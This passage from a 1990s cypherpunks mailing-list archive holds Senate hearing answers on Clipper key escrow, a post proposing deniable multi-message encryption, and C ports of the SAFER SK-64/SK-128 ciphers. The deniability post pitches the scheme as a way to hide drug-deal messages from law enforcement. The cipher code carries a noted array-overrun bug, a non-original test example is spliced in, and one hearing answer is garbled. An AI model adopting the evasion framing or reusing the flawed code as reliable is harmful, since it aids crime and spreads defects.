The Department of Justice credits information gleaned through
wiretaps as leading to more than 20,000 felony convictions since
the early 1980s.  This would not have been possible if the
criminals had been using encryption systems the FBI could not
break.

Without government action, however, this fortunate situation
will change.  At present most people, and most criminals, don't use
encryption.  However, there is an increasing public awareness of
the value of encryption for protecting private personal and
business communications.  Increasing demand for encryption by the
public will likely lead to the widespread use of some form of
standardized encryption on the public telecommunications 
network.

This development would have great benefits for the country.
Legitimate businesses and private individuals could use the
telecommunications system secure in the knowledge that their
private information such as business records and credit card
numbers could not be intercepted by third parties.

But there is a down side.  Criminals, terrorists, and others
could also use the system to plan crimes, launder money, and the
like, completely secure in the knowledge that law enforcement
agencies could not listen to those communications.  Just as
legitimate businesses operate much more efficiently and effectively
using the telecommunications system than they could without it, so
will criminal enterprises be able to operate more efficiently and
effectively if they no longer have to avoid using the
telecommunications system.

The United States is faced with a choice.  We can sit back and
watch as the emerging national information infrastructure becomes
a valuable tool for criminals and terrorists to use to plan and
carry out their activities with complete security, or we can take
steps to maintain the current ability of government to conduct
lawful wiretaps so that prudent criminals will have to find other
less efficient ways to operate and foolish ones may be caught.  Key
escrow encryption is the latter option.

Q:   Would widespread use of the Skipjack algorithm harm U.S.
exports?  Do you think it is unlikely foreign businesses will
purchase American encryption technology if the U.S. Government
holds a set of the decoding keys?

Answer:  I do not believe that widespread use of key escrow
encryption in the United States will harm U.S. exports.  If it has
any effect at all, it could increase exports somewhat.  Key escrow
encryption products provide another option for foreign purchasers
that they have not had in the past; to the extent that foreigners
do purchase key escrow encryption products, it will mean an
increase in exports.  Meanwhile, U.S. exporters are free to
continue to sell the products they currently sell in foreign
markets and to seek license approvals for new products.

It is difficult to predict the foreign market for U.S. key
escrow encryption technology.  Businesses that fear U.S. Government
interception of their communications presumably would avoid
products for which the U.S. Government holds keys.  However, there
are a number of reasons why foreign businesses might purchase them.
One major reason would be to communicate securely with U.S.
businesses that use them.  In addition, the superior level of
security provided by key escrow products (against all but lawful
U.S. Government access) may make them attractive to foreign
businesses that do not view U.S. Government access as a major concern.
While some prospective users abroad may steer clear of key escrow
products because the United States will retain access, there may be
many who believe they are unlikely to be targeted by U.S.
intelligence in any case or for whom the superior security offered
by key escrow encryption products against threats of greater
concern may make key escrow products an attractive option.  For
example, a distributor of pay-TV programming may depend on
encryption to ensure that only those viewers who pay for the
service can decrypt the TV signal.  Such a distributor probably
would not be concerned about the threat of access by the United
States Government, and might favor suitable key escrow encryption
products over competing products that use weaker encryption
algorithms.

Q:   You were present when the previous panelist, Stephen Walker,
described how present U.S. laws prohibit his company from exporting
encryption products.  As I understand it, Senator Murray's bill
S.1846, attempts to relax these export controls somewhat.

Please give us your views on this legislation.

Answer:  I support the Administration's position, as announced
by the White House on February 4, that current export controls must
remain in place and that regulatory changes should be implemented
to speed exports and reduce the licensing burden on exporters.  The
bill you reference appears to be inconsistent with the
Administration position.  I would be happy to provide you further
information on the Administration's reasons for maintaining the
current export controls in an appropriate setting.

*Questions from Senator Murray:

Q:    In my office in the Hart building this February, I downloaded
from the Internet an Austrian program that uses DES encryption.
This was on a laptop computer, using a modem over a phone line.
The Software Publishers' Association says there are at least 120
DES or comparable programs world wide.  However, U.S. export
control laws prohibit American exporters from selling comparable
DES programs abroad.

With at least 20 million people hooked up to the
Internet, how do U.S. export controls actually prevent criminals,
terrorists, or whoever from obtaining DES encryption software?

Answer:  Serious users of encryption do not entrust their
security to software distributed via networks or bulletin boards.
There is simply too much risk that viruses, Trojan Horses,
programming errors, and other security flaws may exist in such
software which could not be detected by the user.  Serious users of
encryption, those who depend on encryption to protect valuable data
and cannot afford to take such chances, instead turn to other
sources in which they can have greater confidence.  Such serious
users include not only entities which may threaten U.S. national
security interests, but also businesses and other major consumers
of encryption products.  Encryption software distribution via
Internet, bulletin board, or modem does not undermine the
effectiveness of encryption export controls.   

[Primary written questions for Admiral McConnell]

1.   The Defense Authorization Bill for Fiscal Year 1994 has
authorized $800,000 to be spent by the National Research Council of
the National Academy of Sciences to conduct a study of federal
encryption policy.  Can we wait to implement the key escrow
encryption program until we have the benefit of the NRC's study?
Do you think this study is necessary?  Should this study be
expedited?

Answer:  We do not believe that we can wait until after the
NRC study is completed in 1996 to begin implementation of the key
escrow initiative.  The information technology industry is dynamic
and fast-moving, and to wait another two years or more would, we
believe, jeopardize the success of the initiative.  Industry demand
for encryption products is growing, and the technology is available
now to meet that demand with encryption products that provide an
outstanding level of security to the user conduct lawful wiretaps.
To wait for the completion of the NRC study to other encryption
products which would defeat lawful wiretaps.  We believe that such
a delay would not be in the best interest of the American 
people.

Neither do we believe that the study should be expedited.  For
our part, we will carefully consider the conclusions of the NRC
study.  We expect that it will give very careful consideration to
the issues, and we would not want the pressure of an unnecessarily
short deadline to limit the study group's ability to produce the
best report possible.

2.   The Administration has said that it is continuing to restrict
export of the most sophisticated encryption devices, in part,
"because of the concerns of our allies who fear that strong
encryption technology would inhibit their law enforcement
capabilities."  Do we really need to help our allies by prohibiting
the export of strong American encryption products, since those same
countries can simply control the encryption bought within their
borders?

Answer:  Exports of encryption products are subject to review
primarily to protect U.S. national interests, including national
security, law enforcement, foreign policy, and other important
interests.  The law enforcement concerns of our allies are a
consideration, especially as the ability of our allies to combat
terrorism, drug trafficking, and other international law
enforcement problems can have direct benefits to the United States.
However, foreign law enforcement concerns do not drive our export
control policy.  We would continue to review encryption exports to
protect U.S. national interests even if foreign law enforcement
concerns disappeared.

3.   Do you know whether foreign governments would be interested in
importing key escrow encryption products to which they hold the
decoding keys?

Answer:  Several foreign governments have expressed interest
in key escrow encryption technology due to their own law
enforcement concerns.  There have been some preliminary
discussions, but issues such as who would hold the escrowed keys
and the circumstances of government access to escrowed keys must be
fully vetted.

4.   The Government wants the key escrow encryption standard to
become the de facto industry standard in the United States.  Would
the Government abandon the Clipper Chip program if it is shown to
be unsuccessful beyond government use?

Answer:  We do not expect the program to be unsuccessful
beyond government.  We have developed a sound security product that
we expect will find many uses in government information systems and
further believe that government use will bring with it a commercial
market, particularly in the defense sector.  We have developed a
sound security product that we expect will find many uses in
government information systems regardless of its success in
commercial markets.

5.   Openly available devices, such as Intel-compatible
microprocessors, have seen dramatic gains, but only because
everyone was free to try to build a better version.  Given the
restrictions on who can build devices with the classified skipjack
algorithm, how will key escrow chips keep up with advances in
semiconductor speed, power, capacity and integration?

Answer:  Despite the requirements that a firm must meet to
produce key escrow encryption chips, we expect that there will be
a number of manufacturers competing against each other to produce
the best product, and that such competition will drive them to keep
up with the latest technological advances.  It is worth noting that
only a few companies can produce the sophisticated microprocessors
you reference, yet the competition in that market has driven them
to achieve remarkable advances in that technology.  NSA's STU-III
secure telephone program provides an example of a cryptographic
product line that keeps pace with technology.

The presence of a classified algorithm does not preclude
keeping pace with technology.  Through NSA's use of a competitive,
multi-vendor approach, STU-III secure telephone products have
continued to evolve in response to user requirements and
technological advances despite their use of a classified encryption
algorithm and the consequent need for security restrictions on the
manufacturers.

6.   How well does the Skipjack algorithm work on telecommunications
operating at very high speeds?  Is NSA working on another algorithm,
called BATON, that could be used in high speeds with a key escrow
system?  Will Capstone be compatible with BATON?

Answer:  Using currently available microelectronics technology
the SKIPJACK algorithm could not be used for encryption at very
high speeds.  BATON is the name of an algorithm developed by NSA
that could be used at higher rates of speed.  We have no plans to
develop key escrow encryption devices using BATON, however.
Instead, we are considering another algorithm for use at high
speeds with a key escrow system.

A high-speed key escrow device based on an algorithm other
than SKIPJACK would not be "compatible with Capstone" in the sense
that traffic encrypted by such a device could not be decrypted by
Capstone, and vice versa.  However, since such a device would be
used for much higher-speed applications than those for which
Capstone was designed, there would be no need for it to be
compatible with Capstone in that sense.

7.   Can Capstone be used to encrypt video programming?  If so,
have cable companies been approached by any government agency to
use Capstone to scramble or encrypt cable program?

Answer:  Capstone could be used to encrypt any digital signal,
including video programming, operating at up to about 10 million
bits per second.  It could be used for encrypting individual video
channels but not for bulk encryption of many channels multiplexed
together in a single link.  NSA is not aware of any government
agency approaching cable companies to urge the use of Capstone.
Two manufacturers have asked us about the suitability of key escrow
devices for this purpose, however.

8.   Encryption software is available that can be used with Clipper
to encrypt a message before after it has been encrypted with
Clipper.  This "double encrypting" risks bypassing the key escrow
feature.  If a sender first encrypts the message with software
using DES, and then transmits the message "double encrypted" with
Clipper, can you tell from looking at the cipher, or encrypted
text, that the underlying message was encrypted?

Answer:  The only way to tell that a message has been "double
encrypted" in this way would be to decrypt the "outer layer" of
encryption, i.e. that done with Clipper.  Only then would one be
able to tell that the message had first been encrypted with
something else.
 
----------

   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpb@miamisci.org (Joe Block)
Date: Thu, 14 Sep 95 05:36:40 PDT
To: keelings@wu1.wl.aecl.ca
Subject: Re: Scientology tries to break PGP - and
Message-ID: <v01520c00ac7d510fd201@[198.79.48.44]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

re:
>[snip]
>> When the safety is finally removed from the gun at your head (sorry for
>> the drama) you hand over your alternate secret key.  If decrypted with the
>> "alternate" or "fake" secret key, the encrypted file is wiped until it
>> reaches a marker; the remainder of the file is displayed.  If you use your
>> "primary" or "real key", the extraneous text is simply stripped.

Instead of stripping, how about adding an offset to the start and end of
the ciphertext to each encoded idea key.  This way, I can send text A to
key A, text B to key B, C to C and so on.  As long as the recipient and
I have agreed in advance on which key to use to exchange the real message,
who can say otherwise?  If code words are used in all the messages to
refer to any illegal acts, ("ship me 30 kilos of smack" might be a tad
incriminating) how can anything be proved even if the recipient is
compelled to divulge their key?

An added advantage to this scheme is that if properly used it should help
throw a monkey wrench into traffic analysis by the nosy.  If I regularly
exchange encrypted messages with several different recipients, I can
enclose a separate plaintext for each, make one massive combined
cyphertext and send it to all of them.  The ones I have no instructions
or trade secrets for today will each receive "Ignore this message,"
followed by a randomly selected random number of fortunes or other random
data (so each message to be ignored will have different length different
plaintext to further thwart analysis).

This may be combined with stealth PGP headers to make it difficult for
LEAs to determine all recipients for the purpose of getting a subpoena
for their keys.

Joseph Block <jpb@miamisci.org>

"We can't be so fixated on our desire
 to preserve the rights of ordinary Americans ..."
 -- Bill Clinton  (USA TODAY, 11 March 1993, page 2A)
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hroller Anonymous Remailer <hroller@c2.org>
Date: Thu, 14 Sep 95 09:12:58 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199509141607.JAA25886@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


/* SAFER SK-64 By James L. Massey who did not do this
   conversion and is not responsible for any bugs in it.

   This is a 'C' conversion of the reference Turbo Pascal implementation

Examples of Encryption with SAFER SK-64 (i.e., with the strengthened key
schedule of 64 bits.)
 
PLAINTEXT is        1   2   3   4   5   6   7   8
The KEY is          0   0   0   0   0   0   0   1
after round 1     131 177  53  27 130 249 141 121
after round 2      68  73  32 102 134  54 206  57
after round 3     248 213 217  11  23  68   0 243
after round 4     194  62 109  79  24  18  13  84
after round 5     153 156 246 172  40  72 173  39
after round 6     154 242  34   6  61  35 216  28
CRYPTOGRAM is      21  27 255   2 173  17 191  45
 
PLAINTEXT is        1   2   3   4   5   6   7   8
The KEY is          1   2   3   4   5   6   7   8
after round 1     223  98 177 100  46 234  13 210
after round 2     182 246 230  93 158  14  48  89
after round 3      45 234 128 149  40 101  10 134
after round 4      30  17 249 236 158 120  69 100
after round 5       1 200 182 241   0 127 152 162
after round 6     144  85  94 214   5  38  65 150
CRYPTOGRAM is      95 206 155 162   5 132  56 199
*/


#include <stdio.h>


/* globals */

unsigned char a1,a2,a3,a4,a5,a6,a7,a8,
              b1,b2,b3,b4,b5,b6,b7,b8,
              r;

unsigned char k[21][8],k1[9];

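/* logtab has 257 entries: init_tables() stores logtab[256] while
   exptab[128] still holds 256, which is past the end of a 256-entry array */
int logtab[257],exptab[256],i,j,n;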

void mat1(unsigned char p1,unsigned char p2,unsigned char *q1,unsigned char *q2)
{
  *q2=p1+p2;
  *q1=*q2+p1;
}

void invmat1(unsigned char p1,unsigned char p2,unsigned char *q1,unsigned char *q2)
{
  *q1=p1-p2;
  *q2=-*q1+p2;
}

void init_tables(void)
{
/* This portion of the program computes the powers of the primitive
   element 45 of the finite field GF(257) and stores these numbers
   in the table "exptab".  The corresponding logarithms to the base
   45 are stored in the table "logtab" */

  logtab[1]=0;
  exptab[0]=1;

  for(i=1;i<=255;i++)
  {
    exptab[i]=(45*exptab[i-1]) % 257;
    logtab[exptab[i]]=i;
  }

  exptab[128]=0;
  logtab[0]=128;
  exptab[0]=1;
}

void set_rounds(void)
{
  int rounds;

  do
  {
    printf("Enter number of rounds (max 10): ");
    scanf("%d",&rounds);
  } while(rounds<1 || rounds>10);

  r=(unsigned char)rounds;
}

void get_plaintext(void)
{
  int i1,i2,i3,i4,i5,i6,i7,i8;

  printf("Enter plaintext as 8 bytes (0-255 separated by spaces)\n");
  scanf("%d%d%d%d%d%d%d%d",&i1,&i2,&i3,&i4,&i5,&i6,&i7,&i8);

  a1=(unsigned char)i1;
  a2=(unsigned char)i2;
  a3=(unsigned char)i3;
  a4=(unsigned char)i4;
  a5=(unsigned char)i5;
  a6=(unsigned char)i6;
  a7=(unsigned char)i7;
  a8=(unsigned char)i8;
}

void get_key(void)
{
  int i1,i2,i3,i4,i5,i6,i7,i8;

  printf("Enter key as 8 bytes (0-255 separated by spaces)\n");
  scanf("%d%d%d%d%d%d%d%d",&i1,&i2,&i3,&i4,&i5,&i6,&i7,&i8);

  k[0][0]=k1[0]=(unsigned char)i1;
  k[0][1]=k1[1]=(unsigned char)i2;
  k[0][2]=k1[2]=(unsigned char)i3;
  k[0][3]=k1[3]=(unsigned char)i4;
  k[0][4]=k1[4]=(unsigned char)i5;
  k[0][5]=k1[5]=(unsigned char)i6;
  k[0][6]=k1[6]=(unsigned char)i7;
  k[0][7]=k1[7]=(unsigned char)i8;
}

void key_schedule(void)
{
/* append a "parity byte" to the key k1 */

  k1[8]=k1[0]^k1[1]^k1[2]^k1[3]^k1[4]^k1[5]^k1[6]^k1[7];

/* derive keys k2, k3, ... k2r+1 from input key k1 */

  for(n=2;n<=(2*r)+1;n++)
  {
  /* each byte of the key k1 is left rotated by 3 */

    for(j=0;j<=8;j++)
      k1[j]=(k1[j]<<3) + (k1[j]>>5);

  /* the key bias is added here to the right rotated k1 */

    for(j=1;j<=8;j++)
      k[n-1][j-1]=k1[(j+n-2) % 9]+exptab[exptab[(9*n)+j]];
  }
}

void encrypt(void)
{
  for(i=1;i<=r;i++)
  {
  /* Key 2i-1 is mixed bit and byte added  to the round input */

    a1=a1 ^ k[2*i-2][0];
    a2=a2 + k[2*i-2][1];
    a3=a3 + k[2*i-2][2];
    a4=a4 ^ k[2*i-2][3];
    a5=a5 ^ k[2*i-2][4];
    a6=a6 + k[2*i-2][5];
    a7=a7 + k[2*i-2][6];
    a8=a8 ^ k[2*i-2][7];

  /* The result now passes through the nonlinear layer */

    b1=exptab[a1];
    b2=logtab[a2];
    b3=logtab[a3];
    b4=exptab[a4];
    b5=exptab[a5];
    b6=logtab[a6];
    b7=logtab[a7];
    b8=exptab[a8];

  /* Key 2i is now mixed byte and bit added to the result */

    b1=b1 + k[2*i-1][0];
    b2=b2 ^ k[2*i-1][1];
    b3=b3 ^ k[2*i-1][2];
    b4=b4 + k[2*i-1][3];
    b5=b5 + k[2*i-1][4];
    b6=b6 ^ k[2*i-1][5];
    b7=b7 ^ k[2*i-1][6];
    b8=b8 + k[2*i-1][7];

  /* The result now enters the linear layer */

    mat1(b1,b2,&a1,&a2);
    mat1(b3,b4,&a3,&a4);
    mat1(b5,b6,&a5,&a6);
    mat1(b7,b8,&a7,&a8);

    mat1(a1,a3,&b1,&b2);
    mat1(a5,a7,&b3,&b4);
    mat1(a2,a4,&b5,&b6);
    mat1(a6,a8,&b7,&b8);

    mat1(b1,b3,&a1,&a2);
    mat1(b5,b7,&a3,&a4);
    mat1(b2,b4,&a5,&a6);
    mat1(b6,b8,&a7,&a8);

  /* The round is now completed! */

    printf("after round %d   %3d %3d %3d %3d %3d %3d %3d %3d\n",
	   (int)i,a1,a2,a3,a4,a5,a6,a7,a8);
  }

/* Key 2r+1 is now mixed bit and byte added to produce the final cryptogram */

  a1=a1 ^ k[2*r][0];
  a2=a2 + k[2*r][1];
  a3=a3 + k[2*r][2];
  a4=a4 ^ k[2*r][3];
  a5=a5 ^ k[2*r][4];
  a6=a6 + k[2*r][5];
  a7=a7 + k[2*r][6];
  a8=a8 ^ k[2*r][7];
}

int main(void)
{
  init_tables();
  for(;;)
  {
    set_rounds();
    get_plaintext();
    get_key();

    printf("PLAINTEXT is    %3d %3d %3d %3d %3d %3d %3d %3d\n",
	   a1,a2,a3,a4,a5,a6,a7,a8);
    printf("THE KEY IS      %3d %3d %3d %3d %3d %3d %3d %3d\n",
	   k[0][0],k[0][1],k[0][2],k[0][3],k[0][4],k[0][5],k[0][6],k[0][7]);

    key_schedule();
    encrypt();

    printf("CRYPTOGRAM IS   %3d %3d %3d %3d %3d %3d %3d %3d\n\n",
	   a1,a2,a3,a4,a5,a6,a7,a8);
  }
}
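
Added example, not part of the original post: a non-interactive, array-based restatement of the SK-64 code above that checks both 6-round vectors from its header comment and adds the decryption direction, which the post prepares with invmat1 but never calls. The names u8, layer, safer_sk64_encrypt, safer_sk64_decrypt and kat_ok are chosen for this example; the round structure is the same one the SK-128 post below uses.

```c
#include <stdio.h>
#include <string.h>
/* Added example: u8, layer(), safer_sk64_*() and kat_ok() are names chosen here. */
typedef unsigned char u8;
static u8 exptab[256], logtab[256];
static const int XOR_POS[8] = {1,0,0,1,1,0,0,1}; /* bytes 1,4,5,8: XOR, then exp */
static const int P[8] = {0,2,4,6,1,3,5,7};       /* pairing for PHT layers 2 and 3 */

/* Powers of 45 modulo 257; 45^128 = 256 is stored as 0, as in the post. */
static void init_tables(void)
{
    unsigned i, e = 1;
    for (i = 0; i < 256; i++) {
        exptab[i] = (u8)e;
        logtab[(u8)e] = (u8)i;
        e = (45 * e) % 257;
    }
}

/* Four mat1() steps (inverse = 0) or four invmat1() steps (inverse = 1). */
static void layer(const u8 in[8], u8 out[8], int shuffled, int inverse)
{
    int j;
    for (j = 0; j < 8; j += 2) {
        int s0 = shuffled ? P[j] : j, s1 = shuffled ? P[j+1] : j + 1;
        if (!inverse) { out[j+1] = (u8)(in[s0] + in[s1]); out[j] = (u8)(out[j+1] + in[s0]); }
        else          { out[s0] = (u8)(in[j] - in[j+1]);  out[s1] = (u8)(in[j+1] - out[s0]); }
    }
}

/* Same schedule as key_schedule() in the post; r must be 1..10. */
static void key_schedule(const u8 key[8], int r, u8 k[21][8])
{
    u8 k1[9];
    int n, j;
    k1[8] = 0;                                   /* parity byte */
    for (j = 0; j < 8; j++) { k[0][j] = k1[j] = key[j]; k1[8] ^= key[j]; }
    for (n = 2; n <= 2*r + 1; n++) {
        for (j = 0; j <= 8; j++)
            k1[j] = (u8)((k1[j] << 3) | (k1[j] >> 5));
        for (j = 1; j <= 8; j++)
            k[n-1][j-1] = (u8)(k1[(j + n - 2) % 9] + exptab[exptab[9*n + j]]);
    }
}

/* r rounds (mix K(2i-1), exp/log, mix K(2i), three PHT layers), then K(2r+1). */
void safer_sk64_encrypt(const u8 pt[8], const u8 key[8], int r, u8 ct[8])
{
    u8 k[21][8], a[8], b[8];
    int i, j;
    key_schedule(key, r, k);
    memcpy(a, pt, 8);
    for (i = 1; i <= r; i++) {
        for (j = 0; j < 8; j++)
            b[j] = XOR_POS[j] ? (u8)(exptab[a[j] ^ k[2*i-2][j]] + k[2*i-1][j])
                              : (u8)(logtab[(u8)(a[j] + k[2*i-2][j])] ^ k[2*i-1][j]);
        layer(b, a, 0, 0); layer(a, b, 1, 0); layer(b, a, 1, 0);
    }
    for (j = 0; j < 8; j++)
        ct[j] = XOR_POS[j] ? (u8)(a[j] ^ k[2*r][j]) : (u8)(a[j] + k[2*r][j]);
}

/* Every step of encryption undone in reverse order, with the same subkeys. */
void safer_sk64_decrypt(const u8 ct[8], const u8 key[8], int r, u8 pt[8])
{
    u8 k[21][8], a[8], b[8];
    int i, j;
    key_schedule(key, r, k);
    for (j = 0; j < 8; j++)
        a[j] = XOR_POS[j] ? (u8)(ct[j] ^ k[2*r][j]) : (u8)(ct[j] - k[2*r][j]);
    for (i = r; i >= 1; i--) {
        layer(a, b, 1, 1); layer(b, a, 1, 1); layer(a, b, 0, 1);
        for (j = 0; j < 8; j++)
            a[j] = XOR_POS[j] ? (u8)(logtab[(u8)(b[j] - k[2*i-1][j])] ^ k[2*i-2][j])
                              : (u8)(exptab[b[j] ^ k[2*i-1][j]] - k[2*i-2][j]);
    }
    memcpy(pt, a, 8);
}

/* The two 6-round vectors quoted in the header comment of the post. */
static const u8 KAT_PT[8]     = {1,2,3,4,5,6,7,8};
static const u8 KAT_KEY[2][8] = {{0,0,0,0,0,0,0,1}, {1,2,3,4,5,6,7,8}};
static const u8 KAT_CT[2][8]  = {{21,27,255,2,173,17,191,45}, {95,206,155,162,5,132,56,199}};

/* Returns 1 if vector v gives the quoted cryptogram and decrypts back again. */
int kat_ok(int v)
{
    u8 ct[8], pt[8];
    init_tables();
    safer_sk64_encrypt(KAT_PT, KAT_KEY[v], 6, ct);
    safer_sk64_decrypt(ct, KAT_KEY[v], 6, pt);
    return memcmp(ct, KAT_CT[v], 8) == 0 && memcmp(pt, KAT_PT, 8) == 0;
}

int main(void)
{
    printf("KAT 1: %d, KAT 2: %d (1 = match)\n", kat_ok(0), kat_ok(1));
    return 0;
}
```

A known-answer check of this kind is the quickest way to catch a transcription slip in a hand-converted cipher, since one wrong index in the key schedule changes every output byte.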




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hroller Anonymous Remailer <hroller@c2.org>
Date: Thu, 14 Sep 95 09:19:58 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199509141614.JAA26330@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


/* SAFER SK-128 designed by James L. Massey who did not do this
   conversion and is not responsible for any bugs in it.

   This is a 'C' conversion of the reference Turbo Pascal implementation

Examples of Encryption with SAFER SK-128 (i.e., 
with the strengthened key schedule of 128 bits.)

PLAINTEXT is        1   2   3   4   5   6   7   8
KEY Ka is           0   0   0   0   0   0   0   1
KEY Kb is           0   0   0   0   0   0   0   1
after round 1     131 177  53  27 130 249 141 121
after round 2      68  73  32 102 134  54 206  57
after round 3     248 213 217  11  23  68   0 243
after round 4     194  62 109  79  24  18  13  84
after round 5     153 156 246 172  40  72 173  39
after round 6     154 242  34   6  61  35 216  28
after round 7     100  31 172  67  44  75 133 219
after round 8      78 226 239 135 210  83  93  72
after round 9      72  64  46 195 163 159 243 114
after round10       3 133  76 190 191  52 220 123
CRYPTOGRAM is      65  76  84  90 182 153  74 247
 
PLAINTEXT is        1   2   3   4   5   6   7   8
KEY Ka is           1   2   3   4   5   6   7   8
KEY Kb is           0   0   0   0   0   0   0   0
after round 1      64 214  74 216 103 222  26  54
after round 2      61  14  68  15  46 111 124  80
after round 3     197 124  96  59 255  24   2  30
after round 4      63  59 214 103 236 166 153  24
after round 5      66 254  26  45 152 223   5 122
after round 6      89  47  58 105 161  38 135  45
after round 7      19 202 174  44  57 206  52  25
after round 8      78 179 113 208 169  26 121  22
after round 9      53  17  81 215 120  37 206 246
after round10     189 177   9   0 186  82 208 253
CRYPTOGRAM is     255 120  17 228 179 167  46 113
 
PLAINTEXT is        1   2   3   4   5   6   7   8
KEY Ka is           0   0   0   0   0   0   0   0
KEY Kb is           1   2   3   4   5   6   7   8
after round 1      95 186 209 220 166  66 213  10
after round 2     200  65 189 120  96 135  42 166
after round 3      64 169  43 166 132 171  31  40
after round 4     199 167  76 189 145 158 241  19
after round 5      71  55 184 212 108 198  77 108
after round 6     173 197 139  11  17  48  97  59
after round 7      17  51 142   4 170   7 207 124
after round 8      62 205 253 225 167 179 228 202
after round 9     133 168 127 138 193 243  34 226
after round10      59 194  69 220 220 231 123 148
CRYPTOGRAM is      73 201 157 152 165 188  89   8
*/


#include <stdio.h>


/* globals */

unsigned char a1,a2,a3,a4,a5,a6,a7,a8,
              b1,b2,b3,b4,b5,b6,b7,b8,
              r;

unsigned char k[25][8],ka[9],kb[9];

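/* logtab has 257 entries: init_tables() stores logtab[256] while
   exptab[128] still holds 256, which is past the end of a 256-entry array */
int logtab[257],exptab[256],i,j,n;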

void mat1(unsigned char p1,unsigned char p2,unsigned char *q1,unsigned char *q2)
{
  *q2=p1+p2;
  *q1=*q2+p1;
}

void invmat1(unsigned char p1,unsigned char p2,unsigned char *q1,unsigned char *q2)
{
  *q1=p1-p2;
  *q2=-*q1+p2;
}

void init_tables(void)
{
/* This portion of the program computes the powers of the primitive
   element 45 of the finite field GF(257) and stores these numbers
   in the table "exptab".  The corresponding logarithms to the base
   45 are stored in the table "logtab" */

  logtab[1]=0;
  exptab[0]=1;

  for(i=1;i<=255;i++)
  {
    exptab[i]=(45*exptab[i-1]) % 257;
    logtab[exptab[i]]=i;
  }

  exptab[128]=0;
  logtab[0]=128;
  exptab[0]=1;
}

void set_rounds(void)
{
  int rounds;

  do
  {
    printf("Enter number of rounds (max 12): ");
    scanf("%d",&rounds);
  } while(rounds<1 || rounds>12);

  r=(unsigned char)rounds;
}

void get_plaintext(void)
{
  int i1,i2,i3,i4,i5,i6,i7,i8;

  printf("Enter plaintext as 8 bytes (0-255 separated by spaces)\n");
  scanf("%d%d%d%d%d%d%d%d",&i1,&i2,&i3,&i4,&i5,&i6,&i7,&i8);

  a1=(unsigned char)i1;
  a2=(unsigned char)i2;
  a3=(unsigned char)i3;
  a4=(unsigned char)i4;
  a5=(unsigned char)i5;
  a6=(unsigned char)i6;
  a7=(unsigned char)i7;
  a8=(unsigned char)i8;
}

void get_key(void)
{
  int i1,i2,i3,i4,i5,i6,i7,i8;

  printf("Enter left half of key as 8 bytes (0-255 separated by spaces)\n");
  scanf("%d%d%d%d%d%d%d%d",&i1,&i2,&i3,&i4,&i5,&i6,&i7,&i8);

  ka[0]=(unsigned char)i1;
  ka[1]=(unsigned char)i2;
  ka[2]=(unsigned char)i3;
  ka[3]=(unsigned char)i4;
  ka[4]=(unsigned char)i5;
  ka[5]=(unsigned char)i6;
  ka[6]=(unsigned char)i7;
  ka[7]=(unsigned char)i8;

  printf("Enter right half of key as 8 bytes (0-255 separated by spaces)\n");
  scanf("%d%d%d%d%d%d%d%d",&i1,&i2,&i3,&i4,&i5,&i6,&i7,&i8);

  kb[0]=(unsigned char)i1;
  kb[1]=(unsigned char)i2;
  kb[2]=(unsigned char)i3;
  kb[3]=(unsigned char)i4;
  kb[4]=(unsigned char)i5;
  kb[5]=(unsigned char)i6;
  kb[6]=(unsigned char)i7;
  kb[7]=(unsigned char)i8;
}

void key_schedule(void)
{
/* append a "parity byte" to the key k1 */

  ka[8]=ka[0]^ka[1]^ka[2]^ka[3]^ka[4]^ka[5]^ka[6]^ka[7];
  kb[8]=kb[0]^kb[1]^kb[2]^kb[3]^kb[4]^kb[5]^kb[6]^kb[7];

/* derive keys k1, k2, ... k2r+1 from input key ka, kb */

  for(j=0;j<8;j++)
    k[0][j]=kb[j];

/* each byte of the key ka is right rotated by 3 */

  for(j=0;j<9;j++)
    ka[j]=(ka[j]>>3) + (ka[j]<<5);

  for(i=1;i<=r;i++)
  {
  /* each byte of the keys ka and kb is left rotated by 6 */

    for(j=0;j<=8;j++)
    {
      ka[j]=(ka[j]<<6) + (ka[j]>>2);
      kb[j]=(kb[j]<<6) + (kb[j]>>2);
    }

  /* the key bias is added to give keys k2i-1 and k2i */

    for(j=1;j<=8;j++)
    {
      k[2*i-1][j-1]=ka[(j+2*i-2) % 9]+exptab[exptab[18*i+j]];
      k[2*i][j-1]=kb[(j+2*i-1) % 9]+exptab[exptab[18*i+9+j]];
    }
  }
}

void encrypt(void)
{
  for(i=1;i<=r;i++)
  {
  /* Key 2i-1 is mixed bit and byte added  to the round input */

    a1=a1 ^ k[2*i-2][0];
    a2=a2 + k[2*i-2][1];
    a3=a3 + k[2*i-2][2];
    a4=a4 ^ k[2*i-2][3];
    a5=a5 ^ k[2*i-2][4];
    a6=a6 + k[2*i-2][5];
    a7=a7 + k[2*i-2][6];
    a8=a8 ^ k[2*i-2][7];

  /* The result now passes through the nonlinear layer */

    b1=exptab[a1];
    b2=logtab[a2];
    b3=logtab[a3];
    b4=exptab[a4];
    b5=exptab[a5];
    b6=logtab[a6];
    b7=logtab[a7];
    b8=exptab[a8];

  /* Key 2i is now mixed byte and bit added to the result */

    b1=b1 + k[2*i-1][0];
    b2=b2 ^ k[2*i-1][1];
    b3=b3 ^ k[2*i-1][2];
    b4=b4 + k[2*i-1][3];
    b5=b5 + k[2*i-1][4];
    b6=b6 ^ k[2*i-1][5];
    b7=b7 ^ k[2*i-1][6];
    b8=b8 + k[2*i-1][7];

  /* The result now enters the linear layer */

    mat1(b1,b2,&a1,&a2);
    mat1(b3,b4,&a3,&a4);
    mat1(b5,b6,&a5,&a6);
    mat1(b7,b8,&a7,&a8);

    mat1(a1,a3,&b1,&b2);
    mat1(a5,a7,&b3,&b4);
    mat1(a2,a4,&b5,&b6);
